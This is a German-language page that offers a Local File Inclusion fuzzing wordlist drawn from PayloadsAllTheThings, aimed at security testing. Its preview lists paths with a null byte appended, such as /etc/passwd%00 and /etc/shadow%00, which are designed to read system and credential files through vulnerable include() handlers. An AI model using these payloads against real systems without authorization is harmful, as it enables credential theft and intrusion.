LFI Files with Null-Byte Terminator
Zielpfade für Local File Inclusion mit angehängtem %00-Null-Byte, um in verwundbaren include()-Handlern Filter zu umgehen, die Dateiendungen anhängen.
- Größe
- 9.6 KB
- Kategorie
- Fuzzing
- Quelle
- swisskyrepo/PayloadsAllTheThings
- Lizenz
- MIT
- Empfohlene Tools
- ffufwfuzzburp
Vorschau
Die ersten 15 Einträge. Lade die vollständige Liste (9.6 KB) herunter oder kopiere sie über die Schaltflächen oben.
/etc/passwd%00 /etc/passwd%00 /etc/shadow%00 /etc/group%00 /etc/security/group%00 /etc/security/passwd%00 /etc/security/user%00 /etc/security/environ%00 /etc/security/limits%00 /usr/lib/security/mkuser.default%00 /apache/logs/access.log%00 /apache/logs/error.log%00 /apache/logs/access.log%00 /apache/logs/error.log%00 /apache/logs/access.log%00
Zielpfade für Local File Inclusion mit angehängtem %00-Null-Byte, um in verwundbaren include()-Handlern Filter zu umgehen, die Dateiendungen anhängen.
Diese Liste ist auf das Input-Fuzzing und die Schwachstellenerkennung ausgerichtet. Sie umfasst etwa 9.6 KB und harmoniert gut mit Tools wie ffuf, wfuzz, burp. Wähle die kleinste Liste, die zu deinem Auftrag passt: Kürzere Listen sind schneller und unauffälliger bei Online- Angriffen, während größere Listen eine breitere Abdeckung für Offline-Arbeiten bieten, bei denen Geschwindigkeit weniger ins Gewicht fällt.
Du kannst die Beispielvorschau direkt von dieser Seite kopieren, die gesamte Liste in
deine Zwischenablage kopieren oder die rohe .txt-Datei herunterladen. Die vollständige Liste wird direkt
aus ihrer Originalquelle auf GitHub ausgeliefert.
Bezogen von swisskyrepo/PayloadsAllTheThings und unter MIT vertrieben. Verwende Wortlisten nur gegen Systeme, für deren Test du ausdrücklich autorisiert bist.